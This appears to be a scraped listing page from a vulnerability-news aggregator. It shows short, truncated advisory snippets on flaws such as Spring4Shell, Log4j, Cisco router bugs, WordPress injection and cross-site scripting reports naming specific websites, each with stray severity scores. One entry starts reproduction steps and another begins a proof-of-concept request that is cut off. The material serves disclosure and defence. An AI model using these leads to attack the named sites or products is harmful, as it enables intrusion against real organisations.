Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck
Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident...
AI Score
AI Score
-0.1AI Score
Spring Framework insecurely handles PropertyDescriptor objects with data binding
Overview The Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. Description The Spring Framework is a Java framework that can be used to create applications such as web applications....
9.8CVSS
0.6AI Score
0.975EPSS
AI Score
td-l-market.ru Cross Site Scripting vulnerability OBB-2429970
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score
Security update for conmon, libcontainers-common, libseccomp, podman (moderate)
An update that solves 7 vulnerabilities, contains one feature and has one errata is now available. Description: This update for conmon, libcontainers-common, libseccomp, podman fixes the following issues: podman was updated to 3.4.4. Security issues fixed: fix CVE-2021-41190 [bsc#1193273],...
6.5CVSS
-0.4AI Score
0.005EPSS
Horde Webmail 5.2.22 - Account Takeover via Email
Horde Webmail is a free, enterprise-ready, and browser-based communication suite developed by the Horde project. It is a popular webmail solution for universities and government agencies to exchange sensitive email messages on a daily basis. It is also shipped as part of the popular hosting...
-0.3AI Score
espace-evasion-delmoly.com Cross Site Scripting vulnerability OBB-2377962
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
-0.1AI Score
espace-corps-pluriel.com Cross Site Scripting vulnerability OBB-2377956
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
-0.1AI Score
Summary Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity: • Enforce multifactor authentication. • Enforce strong, unique passwords. • Enable M365 Unified Audit Logs. • Implement endpoint detection and response tools. From at least January 2020, through...
9.8CVSS
10AI Score
0.973EPSS
Zabbix - A Case Study of Unsafe Session Storage
Introduction Zabbix is a very popular open-source monitoring platform used to collect, centralize and track metrics like CPU load and network traffic across entire infrastructures. It is very similar to solutions like Pandora FMS and Nagios. Because of its popularity, features and its privileged...
9.8CVSS
0.2AI Score
0.97EPSS
-0.3AI Score
7.1AI Score
Huawei EulerOS: Security Advisory for qemu (EulerOS-SA-2022-1105)
The remote host is missing an update for the Huawei...
7.4CVSS
6.8AI Score
EPSS
H3C SSL VPN Username Enumeration
Title: H3C SSL VPN Username Enumeration Advisory ID: ZSL-2022-5697 Type: Local/Remote Impact: Exposure of Sensitive Information Risk: (2/5) Release Date: 12.02.2022 Summary H3C SSL VPN is a secure VPN system based on SSL connections. It allows mobile employees to access corporate networks...
7.2AI Score
espace-client.saria.fr Cross Site Scripting vulnerability OBB-2365211
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
-0.1AI Score
td-safety.ru Cross Site Scripting vulnerability OBB-2365177
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score
td-barselona.ru Cross Site Scripting vulnerability OBB-2365175
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score
Description of the security update for SharePoint Foundation 2013: February 8, 2022 (KB5002155)
Description of the security update for SharePoint Foundation 2013: February 8, 2022 (KB5002155) Summary This security update resolves a Microsoft SharePoint Server security feature bypass vulnerability. For more information about the vulnerability, see Microsoft Common Vulnerabilities and...
4.3CVSS
6.6AI Score
0.001EPSS
WordPress < 5.8.3 - Object Injection Vulnerability
At the time of writing, WordPress powers 43% of websites on the Internet. Its simplicity and robustness enable millions of users to host their blog, eCommerce site, forum, or static website. To protect its users, several security hardening mechanisms were introduced to the code base in the past. .....
7.2CVSS
1AI Score
0.004EPSS
td-favorit.ru Cross Site Scripting vulnerability OBB-2359797
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
AI Score
Critical Cisco Bugs Open VPN Routers to Cyberattacks
UPDATE Critical security vulnerabilities in Cisco’s Small Business RV Series routers could allow privilege escalation, remote code execution (RCE) with root privileges on the devices and more. The RV series is a set of affordable VPN appliances that enable remote workers to connect to a company...
10CVSS
1.5AI Score
0.976EPSS
What is threat modeling ❓ Definition, Methods, Example
Threat modeling is a method for upgrading the security of an application, system, or business process by distinguishing objections and weaknesses, just as carrying out countermeasures to stay away from or alleviate the impacts of structure dangers. Threat modeling supports recognizing the security....
-0.2AI Score
7.4AI Score
9.8CVSS
9.1AI Score
0.02EPSS
-0.3AI Score
AI Score
0.033EPSS
6.1CVSS
AI Score
0.033EPSS
-0.3AI Score
Cross-site Scripting (XSS) - Reflected in pimcore/data-hub
Description pimcore Datahub is vulnerable to Reflected XSS in the Path of Documents, Assets and Objects in the Security Definition tab Steps to reproduce 1.Go to https://demo.pimcore.fun/admin/ and login. 2.In the left menu bar, click the Datahub icon and click on any existing configuration then...
0.4AI Score
Introduction Are you an organization that manages or hosts a huge pool of resources on remote locations/servers? Well, host-based authority-validation technique is the most-suited way to manage the access and control rights related to your hardware and applications. Once implemented, this identity....
-0.3AI Score
Critical Cisco Contact Center Bug Threatens Customer-Service Havoc
A critical security bug affecting Cisco’s Unified Contact Center Enterprise (UCCE) portfolio could allow privilege-escalation and platform takeover. Cisco UCCE is an on-premises customer-service platform capable of supporting up to 24,000 customer-service agents using channels that include inbound....
9.6CVSS
-0.2AI Score
0.001EPSS
Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat
Description A CSRF issue is found in the audit configuration under settings. It was found that no CSRF token validation is getting done on the server-side. If we remove the CSRF token and keep the CSRF token field empty, the action is getting performed. # Proof of Concept Request ``` POST...
4.3CVSS
-0.4AI Score
0.001EPSS
-0.2AI Score
Description of the security update for SharePoint Foundation 2013: January 11, 2022 (KB5002127)
Description of the security update for SharePoint Foundation 2013: January 11, 2022 (KB5002127) Summary This security update resolves a Microsoft SharePoint Server remote code execution vulnerability and Microsoft Office remote code execution vulnerability. To learn more about the vulnerabilities,....
8.8CVSS
9.1AI Score
0.056EPSS
WordPress 5.8.2 Stored XSS Vulnerability
WordPress is the world’s most popular content management system that, according to w3techs, is used by over 40% of all websites. This wide adoption makes it a top target for cyber criminals who seek to compromise high-traffic websites or infect as many web servers as possible. Its code is heavily.....
5.4CVSS
-0.7AI Score
0.004EPSS
EulerOS Virtualization 3.0.2.6 : qemu-kvm (EulerOS-SA-2021-2855)
According to the versions of the qemu-kvm packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : sd_wp_addr in hw/sd/sd.c in QEMU 4.2.0 uses an unvalidated address, which leads to an out-of-bounds read during...
6.7CVSS
7.6AI Score
0.002EPSS
-0.2AI Score
Huawei EulerOS: Security Advisory for qemu-kvm (EulerOS-SA-2021-2855)
The remote host is missing an update for the Huawei...
7.8CVSS
6.4AI Score
0.002EPSS
Summary Apache Log4j Java logging library vulnerability - CVE-2021-44228 (affecting versions prior to v2.15) impacts DCNM Network Management Software. Vulnerability Details ** CVEID: CVE-2021-44228 DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system,...
10CVSS
0.9AI Score
0.976EPSS
Summary Apache Log4j Java logging library vulnerability - CVE-2021-45046 (affecting versions prior to v2.16) impacts DCNM Network Management Software. Vulnerability Details ** CVEID: CVE-2021-45046 DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of...
10CVSS
0.8AI Score
0.976EPSS
Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin...
9.8CVSS
9.6AI Score
0.005EPSS
Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin...
9.8CVSS
9.5AI Score
0.005EPSS
armee-air-espace-collection.gouv.fr Cross Site Scripting vulnerability OBB-2309490
Following the coordinated and responsible vulnerability disclosure guidelines of the ISO 29147 standard, Open Bug Bounty has: a. verified the vulnerability and confirmed its existence; b. notified the website operator about its existence. Technical details of the vulnerability are currently...
-0.3AI Score